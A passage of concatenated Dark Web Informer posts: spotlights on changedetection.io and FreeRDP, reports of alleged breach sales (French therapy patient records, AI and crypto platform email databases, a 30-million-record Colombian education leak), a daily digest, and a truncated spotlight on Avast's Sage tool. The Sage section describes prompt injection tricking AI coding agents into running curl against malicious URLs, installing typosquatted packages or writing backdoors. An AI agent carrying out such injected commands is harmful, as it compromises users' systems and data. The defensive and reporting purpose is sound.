Capabilities 👁️ Visual Selector Point-and-click tool to select exactly which parts of a page to monitor. No need to write CSS selectors or XPath manually. 🤖 Browser Steps Automate interactions before monitoring: login to sites, click buttons, fill forms, accept cookies, navigate search results. 💰 Price & Restock Tracking Dedicated mode for product pages. Extracts pricing metadata, tracks price history, alerts on drops, back-in-stock notifications. 🔔 80+ Notification Channels Discord, Slack, Telegram, email, Teams, webhooks, custom APIs, and everything else via the Apprise library. Jinja2 templating for content. 📊 JSON API Monitoring Monitor API responses with JSONPath or jq filters. Parse embedded JSON in HTML pages. Conditional logic with jq operators. 📄 PDF Change Detection Monitor text changes in PDF files, plus track filesize and checksum changes for binary-level detection. ## // How It Works Add URL → Set check interval → Filter (CSS/XPath/JSON) → Detect change → Notify You add URLs through a web UI running on port 5000, configure how often to check (from minutes to days), optionally set filters to target specific page elements, and configure notification channels. When a change is detected, you get a diff view showing exactly what changed — by word, line, or character. The tool supports both a fast built-in HTTP fetcher and Chrome/Playwright-based fetching for JavaScript-heavy sites. For more complex scenarios, **Browser Steps** let you script interactions before the actual monitoring happens: log into a site, navigate to a specific page, fill in search criteria, accept cookie prompts. After the browser steps execute, the Visual Selector lets you pick which elements to watch. This combination handles the common case of monitoring content that's behind authentication or requires navigation to reach. ## // Filtering & Triggers | Feature | Description | | ------------------- | ------------------------------------------------------------------------ | | CSS Selectors | Target specific elements by class, ID, or structure | | XPath 1.0 / 2.0 | Advanced element selection with regex support via LXML | | JSONPath / jq | Filter and restructure JSON API responses with logic operators | | Trigger on Text | Only alert when specific text appears or disappears | | Ignore Text | Exclude volatile content (timestamps, ad blocks) from diffs | | Regex Filters | Regular expression matching for extract and trigger rules | | Conditional Actions | Trigger only when price is above/below threshold, keyword present/absent | | Scheduling | Timezone-aware schedules, business hours only, weekday/weekend limits | ## // Deployment 🐳 Docker One-Liner `docker run -d --restart always -p "127.0.0.1:5000:5000" -v datastore-volume:/datastore --name changedetection.io dgtlmoon/changedetection.io` — that's it. Also available via docker compose, pip install, or the hosted SaaS at $8.99/month. The self-hosted version runs as a single Docker container (or via pip) and stores data in a local volume. For JavaScript-rendered pages, you add a Playwright-based browser container alongside it (included in the docker-compose.yml). The project also supports Raspberry Pi and ARM devices, per-watch proxy configuration, and importing watch lists from Excel files. A Chrome extension lets you add the current page to your monitoring list directly from the browser. ## // Use Cases The project's README lists an extensive set of real-world applications: price drop alerts, restock monitoring, government regulatory updates, job posting tracking, security advisory monitoring, website defacement detection, API response monitoring, RSS feed generation from web changes, PCI compliance monitoring, real estate listing changes, and regulatory compliance (RegTech). The tool is used across industries from network security to aerospace to data journalism. ## // Considerations ⚠️ Commercial Licensing The source code is Apache-2.0 for self-hosting, but there's a separate COMMERCIAL\_LICENCE.md that applies if you're reselling the software as part of a commercial arrangement. Review this before integrating into a commercial product. **JavaScript pages need a browser container.** The built-in fetcher handles static HTML efficiently, but JavaScript-rendered pages require running a separate Playwright/Chrome container. This increases resource usage and deployment complexity. The SaaS plan includes this out of the box. **Scale considerations.** changedetection.io is designed for individual or small-team use. If you're monitoring thousands of URLs at high frequency, you'll need to consider the resource implications — especially with browser-based fetching. There's no built-in distributed architecture for horizontal scaling. **Website terms of service.** Automated page monitoring at high frequency can violate some websites' terms of service or trigger rate limiting. The tool includes per-watch proxy support and configurable check intervals, but users should be mindful of the targets they're monitoring. **291 open issues.** With 30k+ stars and active usage, there's a substantial backlog of feature requests and bug reports. The project is actively maintained (203 releases, latest March 2026), but the issue count reflects the breadth of use cases people bring to it. ## // Bottom Line changedetection.io fills a need that most people don't realize they have until they need it. The ability to monitor any web page for changes — with visual element selection, browser automation, conditional triggers, and 80+ notification channels — covers an enormous range of practical scenarios. The Docker one-liner deployment and web UI make it accessible to non-technical users, while the XPath/JSONPath/jq filtering, REST API, and proxy configuration serve power users and automation workflows. At 30.7k stars with 203 releases over active development, it's the clear leader in the self-hosted website monitoring space. Whether you're tracking price drops, monitoring competitor pages, watching for regulatory updates, or building automated workflows triggered by web content changes, changedetection.io is the tool most likely to do what you need out of the box. [ GitHub Repository](https://github.com/dgtlmoon/changedetection.io) [ changedetection.io (SaaS)](https://changedetection.io) changedetection.io is open-source under Apache-2.0 for self-hosting. A separate commercial license applies to resale. Users are responsible for complying with target websites' terms of service. ### FreeRDP: The Open-Source RDP Implementation That Powers Linux Remote Desktop URL: https://darkwebinformer.com/freerdp-the-open-source-rdp-implementation-that-powers-linux-remote-desktop/ Last updated: 2026-03-16T17:49:18.000Z Tool Spotlight Remote Access Open Source Mar 14, 2026 # FreeRDP: The Open-Source RDP Implementation That Powers Linux Remote Desktop A free, Apache-licensed implementation of Microsoft's Remote Desktop Protocol. 15 years of development, 23k+ commits, 419 contributors, and 79 releases. FreeRDP is the RDP library under the hood of Remmina, GNOME Connections, KRDC, and most Linux RDP clients. It's also a standalone client, server, and proxy. FreeRDP / FreeRDP FreeRDP is a free remote desktop protocol library and clients C 87.8% C++ 3.5% CMake 3.1% Obj-C 2.6% ★ 12.9k stars v3.24.0 Apache-2.0 15.3k forks 23,291 commits 419 contributors Microsoft's Remote Desktop Protocol is the standard for remote access to Windows machines, but Microsoft doesn't provide an official RDP client for Linux, macOS (beyond a basic app), Android, or iOS. That gap has been filled for over 15 years by **FreeRDP** — an open-source implementation of the full RDP protocol that serves as both a standalone client and a library that other applications build on top of. If you've ever used Remmina, GNOME Connections, or KRDC to connect to a Windows machine from Linux, you were using FreeRDP under the hood. It's the de facto RDP engine for the non-Windows world, and with 23,291 commits across 419 contributors and 79 releases (latest v3.24.0 in March 2026), it's one of the most actively developed open-source infrastructure projects in the remote desktop space. ## // What FreeRDP Provides 📚 libfreerdp (Core Library) Full RDP protocol implementation as a C library. This is what Remmina, GNOME Connections, KRDC, and other clients link against for their RDP support. 🖥️ Client Implementations Standalone clients for X11, Wayland (SDL-based), Windows, macOS, iOS, and Android. The SDL3 client is no longer considered experimental as of v3.16. 🔧 Server & Proxy Shadow server for screen sharing and a proxy server for RDP connection brokering. Enables building custom RDP infrastructure. ⚙️ WinPR (Portable Runtime) A Windows API compatibility layer that lets FreeRDP's codebase use Windows-style APIs portably across Linux, macOS, and other platforms. ## // Protocol Features FreeRDP implements the RDP protocol comprehensively, including the virtual channel system that handles most of the features users care about in a remote desktop session: | Feature | Description | | ------------------- | --------------------------------------------------------------------- | | Clipboard | Bidirectional text, image, and file transfer between local and remote | | Audio | Sound redirection from remote to local, plus microphone input | | Drive Redirection | Mount local drives on the remote machine for file access | | Printer Redirection | Use local printers from the remote session | | Smart Card | Smart card authentication passthrough | | Multi-Monitor | Span sessions across multiple displays | | Graphics Codecs | RemoteFX, GFX pipeline, H.264/AVC, progressive rendering | | Gateway | RD Gateway and TS Gateway support for NAT traversal | | NLA / TLS | Network Level Authentication and TLS encryption | | Serial / Parallel | Legacy port redirection (yes, still maintained) | ## // Architecture Client (X11/SDL/Mac/iOS/Android) → libfreerdp → Transport (TCP/TLS/Gateway) → RDP Server The architecture separates the protocol implementation (`libfreerdp`) from the client frontends and server implementations. This is what makes FreeRDP useful both as a standalone tool and as a library. The core handles the RDP state machine, PDU processing, virtual channel management, graphics decoding, and security negotiation. Client implementations then just need to handle platform-specific rendering and input. The codebase is primarily C (87.8%) with C++ for some components, Objective-C for macOS/iOS clients, and Java for the Android client. The build system uses CMake with extensive CI across platforms including ARM, PowerPC, RISC-V, FreeBSD, macOS, and MinGW cross-compilation. ## // Platform Support | Platform | Client | Notes | | --------------- | -------------- | ---------------------------------------------- | | Linux (X11) | xfreerdp | Most mature client, full feature support | | Linux (Wayland) | sdl-freerdp | SDL3-based, no longer experimental as of v3.16 | | Windows | wfreerdp | Native Windows client | | macOS | Mac client | Objective-C based | | iOS | iOS client | Mobile client | | Android | Android client | Java-based, builds updated in v3.13 | ## // The Ecosystem Role 🔗 The RDP Engine for Open Source FreeRDP isn't just a client — it's the RDP library that most open-source remote desktop tools depend on. Remmina, GNOME Connections, KRDC, Apache Guacamole, and numerous other projects use libfreerdp for their RDP implementation. When these tools support the latest RDP protocol features, it's because FreeRDP implemented them first. This ecosystem role makes FreeRDP's 15.3k forks less surprising — many of those are downstream projects and Linux distribution maintainers. The 374 watchers reflect infrastructure teams and downstream maintainers tracking the project. With Microsoft's Open Specifications providing the protocol documentation, FreeRDP serves as the open-source bridge that keeps RDP interoperable across platforms. ## // Considerations ⚠️ Security Surface As an RDP implementation, FreeRDP processes complex binary protocol data from potentially untrusted sources. The project has had 134 security advisories over its lifetime. The team maintains an active security policy and responds to vulnerabilities, but users should keep FreeRDP updated — especially on internet-facing deployments. **Configuration complexity.** FreeRDP is powerful but not simple. The `xfreerdp` command-line interface has hundreds of flags and options. Getting the right combination of settings for a specific server configuration (NLA, gateway, graphics mode, redirection) often requires consulting documentation. GUI wrappers like Remmina exist specifically to address this. **Wayland maturity.** While the SDL3-based Wayland client graduated from experimental status in v3.16, the X11 client remains significantly more battle-tested. Users on Wayland-only setups may encounter edge cases that don't exist on X11. **Documentation gaps.** Despite the project's maturity, documentation can be sparse or outdated for some features. The wiki is the primary resource, supplemented by the API documentation and a FAQ. For advanced use cases, reading the source or asking in the Matrix room is often necessary. **Build complexity.** Compiling FreeRDP from source involves a substantial dependency tree (OpenSSL, FFmpeg for H.264, PulseAudio/PipeWire for audio, various X11/Wayland libraries). Most Linux distributions package FreeRDP, but those packages may lag behind the latest release. ## // Bottom Line FreeRDP is one of those foundational open-source projects that quietly powers a massive amount of infrastructure. If you connect to a Windows machine from Linux, there's a very high chance FreeRDP is involved. With 23,291 commits, 419 contributors, and 79 releases over 15 years, it's among the most actively maintained protocol implementations in the open-source ecosystem. The latest v3.24.0 release (March 2026) continues active development with C23 support, improved SDL3 client, and ongoing protocol feature parity. For sysadmins managing Windows infrastructure from Linux, developers building remote desktop tooling, or anyone who needs cross-platform RDP access, FreeRDP is the project that makes it possible. [ GitHub Repository](https://github.com/FreeRDP/FreeRDP) [ freerdp.com](https://www.freerdp.com/) FreeRDP is an independent open-source project and is not affiliated with or endorsed by Microsoft. RDP is a protocol developed by Microsoft and documented under the Microsoft Open Specifications program. ### FBI Watchdog Feed URL: https://darkwebinformer.com/fbi-watchdog-feed/ Last updated: 2026-03-16T15:58:10.000Z _This post is for subscribers on the Plus, Pro and Elite tiers only._ ### Alleged Breach of Therapeutes Exposes 71,500 Patient Records and 199,000 Therapy Appointments From French Mental Health Platform URL: https://darkwebinformer.com/alleged-breach-of-therapeutes-exposes-71-500-patient-records-and-199-000-therapy-appointments-from-french-mental-health-platform/ Last updated: 2026-03-13T16:21:43.000Z Dark Web Informer - Cyber Threat Intelligence # Alleged Breach of Therapeutes.com Exposes 71,500 Patient Records and 199,000 Therapy Appointments From French Mental Health Platform March 13, 2026 - 9:29:28 AM UTC France Healthcare / Mental Health Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-13 09:29:28 UTC Threat Actor HexDex Victim Therapeutes.com Industry Healthcare / Mental Health Category Data Breach Alleged Records 71,502 Patients Appointments 199,697 Unique Emails 95,985 Unique Phones 97,518 Price Make Offer Network Open Web Country France ## Incident Overview A threat actor going by HexDex claims to be selling sensitive data from Therapeutes.com, a French online platform that has been connecting users with licensed therapists and mental health professionals since 2013\. The platform allows people to find, book, and attend therapy sessions either in person or through video calls, meaning the underlying database contains deeply personal information about individuals seeking mental health support. What makes this breach particularly concerning is the nature of the data involved. This isn't just emails and phone numbers, the listing explicitly mentions therapy appointment records with consultation and reason fields, which would reveal why individuals sought therapy in the first place. The actor provided the following breakdown: - **Patient Records** \- 71,502 patients with associated personal information. - **Appointment Data** \- 199,697 appointments total, including 56,225 entries with a "consultation" field and 23,492 entries with a "reason" field describing the purpose of the therapy visit. - **Contact Data** \- 95,985 unique email addresses and 97,518 unique phone numbers. - **Government Emails** \- 27 gouv.fr email addresses were identified in the dataset, indicating some French government employees are among those affected. - **Samples** \- The actor provided proof links and a 500-line sample to demonstrate the data's authenticity. The actor is accepting offers rather than listing a fixed price, and recommends using escrow for secured transactions. Given that this involves healthcare data protected under the EU's GDPR and potentially France's additional health data regulations, the exposure of therapy reasons and consultation details represents a severe privacy risk for affected individuals. ## Compromised Data Categories Patient Records Therapy Appointment Details Consultation Fields Therapy Reason / Purpose Email Addresses Phone Numbers Government Employee Emails (gouv.fr) ## Image Preview [![Forum post by HexDex selling Therapeutes.com patient data including 71,502 patients, 199,697 appointments, and therapy consultation details](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/82164831086980798505.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/82164831086980798505.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) ## MITRE ATT&CK Mapping [ T1190 Exploit Public-Facing Application Targets vulnerabilities in internet-facing web applications to gain unauthorized access to backend databases and patient records. ](https://attack.mitre.org/techniques/T1190/) [ T1213 Data from Information Repositories Extracts structured data from application databases, pulling patient records, appointment histories, and consultation details from the platform's backend. ](https://attack.mitre.org/techniques/T1213/) [ T1530 Data from Cloud Storage Accesses cloud-hosted databases or storage buckets containing user data, appointment records, and sensitive health information. ](https://attack.mitre.org/techniques/T1530/) [ T1589.002 Gather Victim Identity: Email Addresses Collects unique email addresses from the breached database, including government employee accounts (gouv.fr), for resale or targeted attacks. ](https://attack.mitre.org/techniques/T1589/002/) [ T1567 Exfiltration Over Web Service Uses web platforms and forums to advertise, sample, and distribute stolen healthcare data to potential buyers. ](https://attack.mitre.org/techniques/T1567/) [ T1078 Valid Accounts Uses compromised or stolen credentials to gain access to the platform's administrative systems or database infrastructure. ](https://attack.mitre.org/techniques/T1078/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Threat Actor Selling Alleged Databases From Crypto, AI, and Finance Platforms Including MagicSlides, TLDR.Tech, and 365.loans URL: https://darkwebinformer.com/threat-actor-selling-alleged-databases-from-crypto-ai-and-finance-platforms-including-magicslides-tldr-tech-and-365-loans/ Last updated: 2026-03-13T15:47:43.000Z Dark Web Informer - Cyber Threat Intelligence # Threat Actor Selling Alleged Databases From Crypto, AI, and Finance Platforms Including MagicSlides, TLDR.Tech, and 365.loans March 13, 2026 - 4:28:44 AM UTC N/A Cryptocurrency / AI / Finance Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-13 04:28:44 UTC Threat Actor Sythe Victims Multiple Platforms Industry Crypto / AI / Finance Category Database Sale Alleged Records \~3.8 Million Emails Databases Listed 7 Price Contact Seller Network Open Web Samples Available via Channel/PM ## Incident Overview A threat actor going by Sythe is advertising the sale of multiple alleged databases spanning cryptocurrency, artificial intelligence, and finance platforms. The actor claims their group has been collecting private data across these sectors and is offering individual databases for purchase, with samples available through their channel or direct messages. The listing breaks down into three categories with the following databases: - **Crypto** \- BTC.Allo.xyz (91K unique emails), Metaxseed.io (5K unique emails), and YesNoError.com Crypto/AI Database (100K unique emails). - **Finance** \- 365.loans (26K emails) and an unnamed 71K-user ecommerce website. - **AI** \- MagicSlides.App (2.3 million emails), TLDR.Tech (1.2 million emails), and YesNoError.com Crypto/AI Database (100K unique emails). The two largest databases by far are MagicSlides.App and TLDR.Tech, which are both AI-focused platforms - MagicSlides is a presentation generation tool and TLDR.Tech is a popular technology newsletter. Combined, those two alone account for roughly 3.5 million of the approximately 3.8 million total email addresses being offered. The actor notes that YesNoError.com appears in both the crypto and AI categories, suggesting it straddles both spaces. No pricing was listed publicly; interested buyers are directed to contact the seller directly. ## Compromised Data Categories Email Addresses User Account Data Cryptocurrency Platform Records Financial Service Records AI Platform User Data Ecommerce User Records ## Image Preview [![Forum post by Sythe advertising private crypto, AI, and finance databases for sale with record counts per platform](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/25119393274302516286.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/25119393274302516286.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) ## MITRE ATT&CK Mapping [ T1589.002 Gather Victim Identity: Email Addresses Collects email addresses from compromised platforms for resale, enabling phishing campaigns, credential stuffing, and targeted social engineering. ](https://attack.mitre.org/techniques/T1589/002/) [ T1078 Valid Accounts Uses compromised or stolen credentials to gain unauthorized access to platforms and extract user databases. ](https://attack.mitre.org/techniques/T1078/) [ T1530 Data from Cloud Storage Accesses and extracts data from cloud-hosted databases and storage services used by SaaS platforms like MagicSlides and TLDR.Tech. ](https://attack.mitre.org/techniques/T1530/) [ T1213 Data from Information Repositories Extracts structured user data from application databases, CRM systems, or internal repositories containing email and account records. ](https://attack.mitre.org/techniques/T1213/) [ T1567 Exfiltration Over Web Service Uses web services and forums to distribute and sell stolen databases, leveraging public platforms for advertising and sample distribution. ](https://attack.mitre.org/techniques/T1567/) [ T1114 Email Collection Harvests email addresses and associated account data at scale from multiple platforms, aggregating them for bulk resale. ](https://attack.mitre.org/techniques/T1114/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Alleged Data Leak Exposes 30 Million Colombian Citizens From ICFES National Education Database URL: https://darkwebinformer.com/alleged-data-leak-exposes-30-million-colombian-citizens-from-icfes-national-education-database/ Last updated: 2026-03-13T16:22:14.000Z Dark Web Informer - Cyber Threat Intelligence # Alleged Data Leak Exposes 30 Million Colombian Citizens From ICFES National Education Database March 13, 2026 - 3:48:06 AM UTC Colombia Education / Government Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-13 03:48:06 UTC Threat Actor CryptoDead Victim ICFES (Colombia) Industry Education / Government Category Data Leak Alleged Records 30+ Million Data Size \~100 GB Motivation Hacktivism / Political Network Open Web Price Free (Public Leak) ## Incident Overview A threat actor operating under the alias CryptoDead has allegedly leaked approximately 100GB of data from ICFES (Instituto Colombiano para la Evaluación de la Educación), Colombia's national education testing institute responsible for administering standardized exams like the Saber tests to millions of students across the country. The actor framed the leak as a politically motivated act of protest, citing frustration with Colombia's healthcare system and calling on Colombian citizens to demand accountability from their government. The post claims the dataset contains personal information on more than 30 million Colombians. Key details from the listing include: - **Data Volume** \- Approximately 100GB of compressed data distributed as a .tar.zst archive, requiring the zstd decompression tool to extract. - **Alleged Scope** \- The actor claims the leak covers more than 30 million Colombian citizens, which would represent a significant portion of the country's population. - **Motivation** \- The leak was explicitly framed as hacktivism, with the actor stating dissatisfaction with the Colombian healthcare system and government leadership as the driving reason. - **Distribution** \- The data was posted freely with a direct download link, not offered for sale, making it immediately accessible to anyone. ICFES manages education evaluation data for the entire Colombian population that participates in standardized testing, meaning the database likely contains sensitive personal identification details, academic records, and potentially contact information spanning years of test administration. If verified, this would be one of the largest data exposures affecting Colombian citizens. ## Compromised Data Categories Personal Identification Information Education & Academic Records Test Scores & Exam Data Contact Information Demographic Data ## Image Preview [![Forum post by CryptoDead announcing ICFES data leak of 30 million Colombian citizens with political motivation statement](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/12768717670418058218.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/12768717670418058218.png) [![Sample data from ICFES leak showing database records with personal information fields](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/12768717670418058219.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/12768717670418058219.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) ## MITRE ATT&CK Mapping [ T1530 Data from Cloud Storage Accesses data stored in cloud services or online databases, extracting large volumes of records from centralized storage systems. ](https://attack.mitre.org/techniques/T1530/) [ T1005 Data from Local System Collects files and data directly from compromised systems, including database exports and document archives. ](https://attack.mitre.org/techniques/T1005/) [ T1560 Archive Collected Data Compresses stolen data into archives before distribution. In this case, a .tar.zst compressed archive was used to package approximately 100GB of data. ](https://attack.mitre.org/techniques/T1560/) [ T1048 Exfiltration Over Alternative Protocol Transfers stolen data out of the target environment using channels other than the primary command-and-control connection. ](https://attack.mitre.org/techniques/T1048/) [ T1567 Exfiltration Over Web Service Uses legitimate web services and file hosting platforms to distribute stolen data publicly, making takedown more difficult. ](https://attack.mitre.org/techniques/T1567/) [ T1078 Valid Accounts Uses compromised or stolen credentials to gain unauthorized access to systems and databases containing sensitive information. ](https://attack.mitre.org/techniques/T1078/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Daily Dose of Dark Web Informer - March 12th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-march-12th-2026/ Last updated: 2026-03-12T22:40:40.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience of **35,800+** unique users monthly and growing. [View details](https://darkwebinformer.com/advertising) 35.8k Unique Visitors 89.3k Pageviews Last 30 days as of Mar 2, 2026\. Next update Mar 31st. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) 💚 ## Support Dark Web Informer Contributions help continue monitoring threats and keeping the community informed. 🟠 MoneroXMR 89Z68A33B9sNRf941f5GczU4ZzarTQsWn6dyMVUbo6mk2zYEamh9hALH1odMiVZfynKhjKPS58ASAfDyFdTW9o29Mwf4ArZ Copied 🟡 BitcoinBTC bc1qvs4pfwascp2uln90g3e3l4agnhnjrdn2t578we Copied 🔷 EthereumETH / ERC-20 / USDT 0xbA6bCf2BF50F9789504401AFbf19E8c2CCaa773D Copied Click address to copy · ETH address accepts USDT, USDC, and other ERC-20 tokens ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources 🔒Subscribers Only — [X/Twitter subscribe](https://x.com/DarkWebInformer/creator-subscriptions/subscribe) ## 🧾 Today's Intelligence Website Posts ❗️ [26,500 Exposed IoT Devices and 3,000 RTSP Cameras in Saudi Arabia Listed for Free Download](https://darkwebinformer.com/26500-exposed-iot-devices-and-3000-rtsp-cameras-in-saudi-arabia-listed-for-free-download/) FREE ❗️ [Alleged Breach of Austrian Trailer Manufacturer HB Brantner With Customer Data, NDAs, and Confidential Drawings Exfiltrated](https://darkwebinformer.com/alleged-breach-of-austrian-trailer-manufacturer-hb-brantner-with-customer-data-ndas-and-confidential-drawings-exfiltrated/) FREE ❗️ [Full Source Code of Sweden's E-Government Platform Leaked From Compromised CGI Sverige Infrastructure](https://darkwebinformer.com/full-source-code-of-swedens-e-government-platform-leaked-from-compromised-cgi-sverige-infrastructure/) FREE ❗️ [Azury Infostealer Source Code Sold for $100 With Full Operator Panel, Crypto Wallet Theft, and Keylogging Capabilities](https://darkwebinformer.com/azury-infostealer-source-code-sold-for-100-with-full-operator-panel-crypto-wallet-theft-and-keylogging-capabilities/) FREE ❗💡 [Sage: Avast's Agent Detection & Response Layer That Guards AI Coding Agents Against Malicious Commands](https://darkwebinformer.com/sage-avasts-agent-detection-response-layer-that-guards-ai-coding-agents-against-malicious-commands/) FREE X/Twitter Updates ❗️ [A threat actor is allegedly selling access to a Cisco Intranet Portal via credentials and VPN.](https://x.com/DarkWebInformer/status/2032081607129993482?s=20) ❗️ [A threat actor is allegedly selling intranet access to Dukascopy Bank SA, a Swiss online forex broker that provides high-quality data for forex, commodities, and other financial instruments.](https://x.com/DarkWebInformer/status/2032083814336380929?s=20) ❗️ [A threat actor is auctioning RDWeb and domain user access to an Australian dental software producer with $22M in revenue, along with 35 GB of client data.](https://x.com/DarkWebInformer/status/2032087239836967284?s=20) ❗️ [A threat actor has allegedly leaked 552,671 user records from TekTreeInc.com, a software development and IT solutions company, reportedly dumped from an unprotected MongoDB instance in March 2026.](https://x.com/DarkWebInformer/status/2032092725542109441?s=20) ❗️ [A threat actor is allegedly selling personal information of 120,000 vehicle owners in Russia, claiming the data was sourced directly from GIBDD, the Russian vehicle registration system.](https://x.com/DarkWebInformer/status/2032103838644134295?s=20) 💡 [A cybersecurity company based in Istanbul discovered a covert audio surveillance device hidden inside a client's vehicle during a routine security sweep.](https://x.com/DarkWebInformer/status/2032105643780329884?s=20) ❗️ [A threat actor is allegedly selling access to Family Energy Spain, a network of gas stations in Spain, claiming it contains 6,759 clients with phone numbers and email addresses.](https://x.com/DarkWebInformer/status/2032115809460310506?s=20) 💡 [This is what the frontend dashboard will look like for FBI Watchdog. Again it will not be available with the updated script.](https://x.com/DarkWebInformer/status/2032126245555544253?s=20) 💡 [Global Malicious Proxy Network Dismantled for Deploying Malware, Defrauding Thousands of U.S. Victims](https://x.com/DarkWebInformer/status/2032134351106806098?s=20) ❗️ [Qilin Ransomware has claimed two victims](https://x.com/DarkWebInformer/status/2032146537795420542?s=20) 💡 [A guy was just added to the FBI's Ten Most Wanted List and was arrested only one hour and 13 minutes after being announced, breaking the previous record set in 1969.](https://x.com/DarkWebInformer/status/2032169296282206452?s=20) 💡 [It's Not Just a Walnut, It's a Secret Camera](https://x.com/DarkWebInformer/status/2032200305429934262?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### Sage: Avast's Agent Detection & Response Layer That Guards AI Coding Agents Against Malicious Commands URL: https://darkwebinformer.com/sage-avasts-agent-detection-response-layer-that-guards-ai-coding-agents-against-malicious-commands/ Last updated: 2026-03-12T19:39:10.000Z Tool Spotlight AI Security Open Source Mar 12, 2026 # Sage: Avast's Agent Detection & Response Layer That Guards AI Coding Agents Against Malicious Commands A lightweight security layer from Gen Digital (Avast/Norton) that intercepts tool calls from Claude Code, Cursor, and OpenClaw — checking URLs against reputation APIs, scanning packages for supply-chain threats, and matching commands against YAML-based threat definitions. Think antivirus, but for AI agents. avast / sage Lightweight Agent Detection & Response (ADR) layer for AI agents — guards commands, files, and web requests TypeScript 89.5% JavaScript 10.1% ★ 127 stars v0.4.3 Apache-2.0 5 forks 81 commits 6 contributors AI coding agents now run shell commands, write files, fetch URLs, and install packages on your behalf. Claude Code, Cursor, and OpenClaw all give agents broad access to your development environment. But what happens when a prompt injection tricks an agent into running `curl` against a malicious URL, or installing a typosquatted npm package, or writing a backdoor into your codebase? The agent follows instructions — it doesn't inherently know the difference between a legitimate command and a malicious one. **Sage** is Gen Digital's (the parent company of Avast and Norton) answer to this problem. It's an Agent Detection & Response (ADR) layer that sits between the AI agent and the system, intercepting tool calls before they execute. It's a new category of security tooling — not protecting against AI threats, but protecting AI agents from being exploited as attack vectors. ## // Detection Layers 🌐 URL Reputation Cloud-based checks against Gen Digital's reputation APIs for malware, phishing, and scam detection. Sends URL hashes, not full URLs. 📋 Local Heuristics YAML-based threat definitions that match dangerous command patterns, file paths, and behaviors locally. No cloud calls needed. 📦 Package Supply-Chain Checks npm and PyPI packages against registry existence, file reputation, and age analysis to catch typosquatting and malicious dependencies. 🔌 Plugin Scanning Scans other installed plugins for threats at session start. Catches malicious extensions that could compromise the agent environment. ## // How It Works Agent issues tool call → Sage hook intercepts → Check URL / command / package → Verdict: allow / warn / block Sage hooks into the tool call pipeline of each supported platform. In Claude Code, it registers as a plugin that intercepts Bash commands, URL fetches, and file writes. In Cursor/VS Code, it runs as an extension. In OpenClaw, it installs as a plugin package. When a tool call comes through, Sage evaluates it against all four detection layers and returns a verdict: allow, warn, or block. The threat definitions are YAML-based rules stored in the `threats/` directory. These define patterns for dangerous operations — things like attempts to exfiltrate environment variables, write to sensitive system paths, download from known-bad domains, or install packages with suspicious naming patterns. The rules are versioned alongside the code and carry their own license (Detection Rule License 1.1). ## // Platform Support | Platform | Installation | Integration Method | | ---------------- | --------------------- | ------------------------------- | | Claude Code | Plugin marketplace | Plugin hook system | | Cursor / VS Code | VSIX extension | Extension API + 